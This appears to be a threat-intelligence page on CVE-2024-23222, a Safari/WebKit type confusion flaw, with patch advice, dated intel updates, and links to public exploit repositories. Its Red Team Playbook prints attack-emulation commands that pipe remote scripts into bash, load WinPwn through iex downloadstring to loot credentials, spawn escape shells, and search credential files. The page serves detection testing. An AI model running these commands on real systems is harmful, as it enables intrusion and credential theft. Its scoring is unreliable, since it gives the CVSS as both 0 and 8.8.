CVE-2024-23222

HIGH CISA KEV POC TTE 777d Pub 23/01 Upd 02/04

Overview

This vulnerability is a type confusion flaw occurring within the Apple Safari browser engine. The root cause lies in insufficient type validation during the processing of web content, leading to erroneous assumptions about object types in memory. The affected component is the Safari browser's JavaScript engine, which mishandles crafted data structures, resulting in memory corruption conditions.

Vulnerability Description

A type confusion issue was addressed with improved checks. This issue is fixed in Safari 17.3, iOS 15.8.7 and iPadOS 15.8.7, iOS 16.7.5 and iPadOS 16.7.5, iOS 17.3 and iPadOS 17.3, macOS Monterey 12.7.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, tvOS 17.3, visionOS 1.0.2. Processing maliciously crafted web content may lead to arbitrary code execution. This fix associated with the Coruna exploit was shipped in iOS 17.3 on January 22, 2024. This update brings that fix to devices that cannot update to the latest iOS version.

Impact

An attacker can execute arbitrary code on a target device by convincing a user to visit a maliciously crafted web page, leveraging the type confusion to corrupt memory and control execution flow. No authentication is required, and the attack vector is remote via web content delivery. This can lead to full compromise of the affected device, including unauthorized data access or system control. The vulnerability is rated with a CVSS score of 0 but enables remote code execution under realistic user interaction scenarios.

Solution

Apple addressed this vulnerability by releasing security updates for multiple platforms. Users should update Safari to version 17.3 and install iOS 15.8.7, iOS 16.7.5, iOS 17.3, iPadOS 15.8.7, iPadOS 16.7.5, iPadOS 17.3, macOS Monterey 12.7.3, macOS Sonoma 14.3, macOS Ventura 13.6.4, tvOS 17.3, or visionOS 1.0.2 as applicable. Detailed patch instructions and advisory information are available at https://support.apple.com/en-us/118479, https://support.apple.com/en-us/120304, and https://support.apple.com/en-us/120305.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

A type confusion vulnerability is a critical flaw that arises when a program mistakenly interprets a variable as a different data type than it was intended to be. This discrepancy can lead to unexpected behaviors, including the execution of arbitrary code. In the case of affected Apple products, the vulnerability was addressed through enhanced checks in various operating systems and applications, including Safari, iOS, iPadOS, macOS, tvOS, and visionOS. The flaw allows an attacker to craft malicious web content that, when processed by the browser, can exploit this type confusion to execute unauthorized commands or access sensitive data. The technical remediation involved implementing stricter validation mechanisms to ensure that data types are correctly managed, thus mitigating the risk of exploitation.

The primary attack vector for this vulnerability is through malicious web content. Attackers may host specially crafted web pages or scripts that exploit the type confusion flaw when a user visits the site using an affected version of Safari or any of the other impacted Apple operating systems. Once the user interacts with the compromised content, the attacker can gain control over the execution flow of the application, potentially leading to full system compromise. Scenarios may include phishing attacks where users are tricked into visiting a malicious site, or drive-by downloads where simply visiting a page can trigger the exploit without user interaction. This makes the vulnerability particularly dangerous, as it can be leveraged against unsuspecting users with minimal effort.

The real-world impact of this vulnerability is significant, especially given its high CVSS score of 8.8, indicating a critical severity level. Organizations that rely on Apple devices for business operations face substantial risks, including data breaches, loss of sensitive information, and potential financial repercussions from remediation efforts. The ability for attackers to execute arbitrary code means that they could install malware, steal credentials, or manipulate data without the user's knowledge. Furthermore, the reputational damage resulting from a successful exploit could lead to a loss of customer trust and confidence, particularly in sectors that handle sensitive information, such as finance, healthcare, and e-commerce.

To effectively detect and mitigate this vulnerability, organizations should prioritize updating their systems to the latest versions of affected software as soon as patches are available. Regularly monitoring for updates and applying them promptly is essential to maintaining a secure environment. Additionally, employing web filtering solutions can help block access to known malicious sites that may attempt to exploit this vulnerability. Security awareness training for employees is also crucial, as it can help users recognize phishing attempts and avoid inadvertently visiting harmful web pages. Implementing robust endpoint protection solutions that can detect and respond to suspicious activities will further enhance an organization’s defense against potential exploitation.

In conclusion, the type confusion vulnerability affecting various Apple products poses a serious threat to both individual users and organizations. The potential for arbitrary code execution through malicious web content highlights the need for vigilant security practices, including timely updates, user education, and proactive monitoring. By understanding the technical details, attack vectors, and real-world implications of this vulnerability, organizations can better prepare themselves to defend against the evolving landscape of cybersecurity threats.




CSURFACE threat intelligence has observed a nuanced shift in the exploitation landscape of CVE-2024-23222. While telemetry indicates a significant reduction in detection activity related to this vulnerability, the Exploit Prediction Scoring System (EPSS) score has concurrently increased by over one-third, signaling a growing likelihood of exploitation attempts in the near term. This divergence suggests that while active exploitation campaigns may have temporarily subsided or become more covert, the underlying risk remains elevated, potentially due to the emergence of new proof-of-concept exploits and enhanced attacker understanding, as evidenced by recent public research and tool releases. The increase in EPSS, now approaching the upper quartile, underscores the need for continued vigilance despite the apparent drop in observed exploit activity. Consequently, the threat level for CVE-2024-23222 should be considered sustained at a high severity, with an emphasis on the potential for renewed or more sophisticated exploitation efforts that could leverage the existing Coruna exploit framework or its derivatives.



Update 2 — July 03, 2026

CSURFACE threat intelligence has detected a slight increase in activity related to CVE-2024-23222, reflected by a modest uptick in telemetry triggers. This change coincides with the continued public availability and refinement of proof-of-concept exploits, including adaptations targeting multiple platforms beyond iOS, such as Linux x86_64. The persistence and subtle growth in detection signals suggest that threat actors are actively experimenting with or incorporating this vulnerability into their toolsets, potentially aiming to bypass existing mitigations. Although the Exploit Prediction Scoring System (EPSS) remains stable, the sustained presence of sophisticated exploit chains—particularly those enabling sandbox escapes and arbitrary code execution—underscores the ongoing operational relevance of this vulnerability. For defenders, this development highlights the necessity of maintaining heightened monitoring and response capabilities, as the vulnerability remains a viable vector for advanced exploitation. Consequently, the overall threat level for CVE-2024-23222 remains elevated, with a cautious outlook toward possible escalation in exploitation attempts leveraging evolving Coruna exploit variants and related toolkits.



Update 3 — July 11, 2026

CSURFACE threat intelligence has identified a notable surge in detection activity related to CVE-2024-23222, indicating increased adversary engagement with this WebKit type confusion vulnerability. This uptick in telemetry suggests that threat actors are intensifying efforts to leverage the Coruna exploit kit and its variants, which continue to demonstrate sophisticated sandbox escape and arbitrary code execution capabilities. Concurrently, new proof-of-concept exploits have emerged, expanding the exploit landscape beyond iOS to include Linux x86_64 environments, thereby broadening the potential attack surface. Although the EPSS score remains stable, the qualitative increase in exploitation attempts and the diversification of platforms targeted underscore a heightened operational interest. For defenders, this evolving activity signals a growing risk of successful exploitation in environments where patching is incomplete or delayed. Consequently, the threat level associated with CVE-2024-23222 is elevated further, warranting sustained vigilance and enhanced detection efforts to address the expanding scope and complexity of exploitation attempts.



Update 4 — July 20, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2024-23222, reflected by a modest uptick in telemetry triggers. This subtle rise, while not yet indicative of a widespread surge, suggests persistent adversary interest in leveraging the WebKit type confusion vulnerability despite the availability of patches across affected Apple platforms. Concurrently, new proof-of-concept exploits have surfaced, expanding the technical understanding and potential attack vectors, including sandbox escape chains and adaptations for alternative operating systems. These developments underscore the evolving sophistication and diversification of exploitation techniques associated with this vulnerability. For defenders, this means that environments with incomplete patching remain at tangible risk, and detection capabilities must adapt to the broadened exploit landscape. Although the overall risk level remains high, the incremental increase in exploitation activity and the emergence of novel exploit variants elevate the threat posture, warranting continued monitoring and analysis to preempt escalation.



Update 5 — August 04, 2026

CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2024-23222, reflected by a significant uptick in detection activity across multiple telemetry sources. This increase coincides with the wider dissemination of new proof-of-concept exploits and advanced adaptations of the Coruna exploit kit, which now demonstrate expanded capabilities including sandbox escape and cross-platform applicability. The emergence of these refined exploit variants signals a growing sophistication in attacker methodologies, increasing the likelihood of successful compromise in environments where patching is incomplete or delayed. Although the EPSS score remains stable, the qualitative surge in exploitation attempts elevates the operational threat level, underscoring the urgency for defenders to maintain vigilant detection and response postures. This evolving landscape highlights the persistent risk posed by this vulnerability and the necessity for continuous monitoring to anticipate further exploit innovation.

Affected Products (12)

Vendor Product Version CPE
apple Apple Safari All cpe:2.3:a:apple:safari:*:*:*:*:*:*:*:*
apple Apple Ipados All cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
apple Apple Ipados All cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
apple Apple Ipados All cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*
apple Apple Iphone Os All cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
apple Apple Iphone Os All cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
apple Apple Iphone Os All cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*
apple Apple Macos All cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
apple Apple Macos All cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
apple Apple Macos All cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*
apple Apple Tvos All cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*
apple Apple Visionos All cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

GitHub PoCs (4)

Repository Author Stars Forks Date Link
FuzzySecurity/Cassowary-CVE-2024-23222-x86_64
Adaptation of Cassowary CVE-2024-23222 for Linux x86_64
FuzzySecurity 10 1 2026-03-13 View
Rohitberiwala/CVE-2024-23222-Coruna-Exploit-Kit-Deobfuscated
Comprehensive deobfuscated research of the Coruna iOS exploit kit targeting CVE-2024-23222. Analysis of WebKit Type Conf...
Rohitberiwala 6 1 2026-03-10 View
Meysamshiralii/coruna_analysis
Analyze and deobfuscate the Coruna Exploit Kit (CVE-2024-23222) to enhance understanding and detection of related threat...
Meysamshiralii 2 0 2026-03-15 View
Umit-MHL/webkit-cve-2024-23222
CVE-2024-23222 WebKit type confusion → iOS 16.4.1 sandbox escape. Full chain: JSC JIT confusion → addrof/read64/write64 ...
Umit-MHL 1 0 2026-05-19 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

20 events
2026-08-04
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-08-03
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-28
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-27
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-26
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-07
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-07-06
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-29
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-16
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-12
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-03-10
PoC Published (4 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2026-03-09
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2024-01-23
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Buffer Overflow
63% buffer_overflow
Remote Code Execution
63% rce
Code Injection
47% code_injection

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1505.003 Web Shell Kill Chain persistence Linux, macOS, Network Devices, Windows
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns

No CAPEC pattern mapped to this CVE.

Red Team Playbook

44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1505.003 Web Shell Written to Disk Windows CMD
This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. Idea from APTSimulator. cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
Command (CMD)
xcopy /I /Y "#{web_shells}" #{web_shell_path}
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
T1552.001 WinPwn - powershellsensitive Windows PowerShell
Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
T1552.001 WinPwn - sensitivefiles Windows PowerShell
Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput

Detection & Response Rules

No detection or response rules found for this CVE.

No news articles found for this CVE.

References (26)

Title Tags URL
nvd.nist.gov
NVD reference
https://nvd.nist.gov/vuln/detail/CVE-2024-23222
support.apple.com
GitHub CVE
https://support.apple.com/en-us/118479
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120304
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120305
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120307
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120309
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120310
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120311
support.apple.com
GitHub CVE
https://support.apple.com/en-us/120339
support.apple.com
GitHub CVE
https://support.apple.com/en-us/126632
seclists.org
NVD API Third Party Advisory
http://seclists.org/fulldisclosure/2024/Feb/6
seclists.org
NVD API Third Party Advisory
http://seclists.org/fulldisclosure/2024/Jan/34
seclists.org
NVD API Third Party Advisory
http://seclists.org/fulldisclosure/2024/Jan/40
lists.fedoraproject.org
NVD API Broken Link
https://lists.fedoraproject.org/archives/list/[email protected]/message/US43EQFC2IS66EA2CPAZFH2RQ6WD7PKF/
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/en-us/HT214055
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/en-us/HT214059
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/en-us/HT214061
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/kb/HT214055
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/kb/HT214056
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/kb/HT214057
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/kb/HT214058
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/kb/HT214059
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/kb/HT214061
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/kb/HT214063
support.apple.com
NVD API Release Notes Vendor Advisory
https://support.apple.com/kb/HT214070
cisa.gov
NVD API US Government Resource
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-23222